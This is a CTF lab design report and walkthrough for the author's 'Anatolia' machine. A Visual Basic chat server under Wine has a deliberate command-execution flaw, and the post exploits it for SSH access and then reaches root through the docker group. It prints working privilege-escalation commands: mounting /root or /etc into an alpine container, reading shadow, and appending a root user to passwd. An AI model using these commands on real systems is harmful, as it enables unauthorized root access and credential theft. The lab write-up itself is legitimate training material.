Anatolia CTF Machine

This box is designed to get players hacking the machine of a malazgirt chat program reverse engineer.It aimed to break the server and client program with reverse engineering and to get the shell by running commands on the server on the client and then to obtain root privileges by taking advantage of the docker vulnerability in the machine.

Bu yazımda malazgirt sohbet programının ters mühendislik makinesini sizlerle paylaşıyorum.Tersine mühendislik ile server ve client programını kırmayı ve client üzerinde server üzerinde komutlar çalıştırarak shell’i elde etmeyi ve ardından root ayrıcalıklarını elde etmeyi amaçlamıştır. makinedeki docker ve özel yazdığım chat programındaki eklediğim güvenlik açıklarından yararlanarak.

Raporu ve yazımı ingilizce yaptım, daha geniş kitlelere ulaşması için türkçeye çevirmiyorum umarım sorun olmaz, olmadı google translate ile kullanıp çevirin :)

DİKKAT
Eğer makinenin nasıl hacklendiğini okumadan kendiniz denemek istiyorsanız lütfen yazının bundan sonraki kısımlarını okumayın.
DİKKAT

1 Summary

1.1 General İnformation

This report contains information and solution of the named Anatolia machine made for Github.

This box is designed to get players hacking the machine of a malazgirt chat program reverse engineer.

It aimed to break the server and client program with reverse engineering and to get the shell by running commands on the server on the client and then to obtain root privileges by taking advantage of the docker vulnerability in the machine.

The vulnerability of the malazgirt chat program, which was written in visual basic, should be solved by reverse engineering,

Then, a reverse shell should be provided by exploiting the server program running on wine on the linux server.

The reason I made this challenge is my interest in reverse engineering, and I prepared this challenge to see if Github members can hack a server written for windows on linux.

1.1.1 Recommended Equipment

2 Gb Ram

2 or 1 core processor

Any- video card

Recommended Hard Drive 20 Gb (System file average 9gb)

1.1.2 Key Processes And Automation

With the software called gnu-tweaks and the gnu automatic login feature is active, so the malazgirtserver.exe application (it opens automatically when the operating system is opened via the wine program)

Malazgirtserver.desktop file content:
[Desktop Entry]
Name=Malazgirtserver
Comment=A short description of the application
Exec=wine /home/gordion/.wine/drive_c/Malazgirtserver.exe
Icon=/full/path/to/icon-file
Terminal=true
Type=Application

Automatic gordion user login is set to not ask for password, so the server will start automatically when the machine is turned on.

The malazgirt server application has a code execution vulnerability.

The attacker can download server and client applications from the web site (apache server) that is active on port 80 installed on the machine, also for information on the web server (tip information has been added indicating that wine is running and a windows program server is running on linux)

In order to increase the authority, the docker vulnerable version 18.09.1 has been installed and the gordion user has been added to the docker group.

Thus, the path will be set (export PATH=$PATH:/sbin) and root authority will be obtained through docker.

for example with the command: docker run -v /root:/mnt -it alpine

1.1.1 Docker

No active docker running, must be alpine to use only during privilege upgrade

docker run -v /root:/mnt -it alpine

or

docker run -v /etc/:/mnt -it alpine
cd /mnt
cat shadow

or

openssl passwd -1 -salt username
find / \( -perm -u+s -or -perm -g+s \) -type f -exec ls -l {} \;
docker run -v /etc/:/mnt -it alpine
cd /mnt
echo ‘username:saltpasswd:0:0::/root:/bin/bash’ >>passwd
tail passwd

1.1.2 Firewall Rules

N/A.(standart)

1.1 Producer

The information on the test and the team that prepared the report is below:

Pozitron ( Hasan Ç.)

Engineer — Penetration tester

1.1 Network Settings

Dns and other settings default

Network : Bridge mode

1.1 Gathering Information

1.1.1 Server and Service Information

192.168.1.13 (Anatolia)

Port — — — Protokol — — — Servis

22 — — — — tcp — — — ssh

80 — — — — tcp — — — http

1071 — — — tcp — — — chat program server(Malazgirt)

2 Anatolia Machine — Walkthrough

We start with port scanning and information gathering phase at first.

I’m scanning with nmap

Open ports: 22(default ssh) 80(web) 1071(unknow)

At first we go to portal no. 80 and do a preliminary research.

Simple a html website.

I scanned the site content with burb. and the content was as follows

Then I downloaded the program and the server on the site and analyzed their code with reverse engineering.

I encountered a 223 character limit.

Likewise, when I analyzed the codes with Decompile in the server program, I found that it runs the command after 223 characters in the cmd shell.

It was also ı find written as a string in the private password

I ran the client and connected to the port number 1071 to test sending messages. server was working without any problem

Then, with the test command on the client, I created 223 character random data and the end command and started the tests.

and I started trying to create a test file in the site directories I had previously found.

then I saw that I have write permission to the logs file and write the test file

Then I learned the necessary information by reading the etc / passwd file, listing the username and installed programs, and printing the test file.

I could get ssh reverseshell or run it by throwing a payload. But the commands I sent were working on cmd shell, ie windows shell. and since the program is written in visual basic, because it runs on debian via wine and since I can run the program with user (gordion) privileges and run commands, I created ~ / .ssh / authorized_keys file and tried to connect with ssh.

Create a key pair with the ssh keygen and keep the echo command pub. I printed the key to the .ssh folder.

I then tried the login sight with that key and entered.

1.1 Privilege Escalation

In my research at the post exploit stage, it is seen that the user is in the docker group and the docker can run the suitbit with root privileges.

and I managed to read the flag file by upgrading the root directory by creating a container with the following command

$ docker run -v /root/:/mnt -it alpine

I hope you enjoyed this machine.
I specially designed this machine for Github users.
Thank you.
Yours truly

Engineer — Penetration testing specialist
Hasan Ç. (positron)

--

--

--

Geophysical Engineer, İnformation Security, Cyber Security And Penetration Tester Specialist blog https://realradioactive.github.io/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

☄️☄️AuroraFS Testnet Airdrop event is on!!!

Rails — Authentication and Authorization with bcrypt

{UPDATE} Arcane Quest HD Hack Free Resources Generator

{UPDATE} Birds Hunting Hack Free Resources Generator

Security Patching & Vulnerability for Agile Scrum Teams

Check out which coins have had their prices rallied..!

Hacking incidents down, while some insider health data breaches took 5+ years to discover

What is AndroRAT and How To Use It? (101 Guide)

What is AndroRAT and How To use it (Guide)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hasan Ç.

Hasan Ç.

Geophysical Engineer, İnformation Security, Cyber Security And Penetration Tester Specialist blog https://realradioactive.github.io/

More from Medium

HackTheBox — Previse

HTB -Previse Walkthrough

TryHackMe | CTF | Walkthrough | Raven

Previse HacktheBox Walkthrough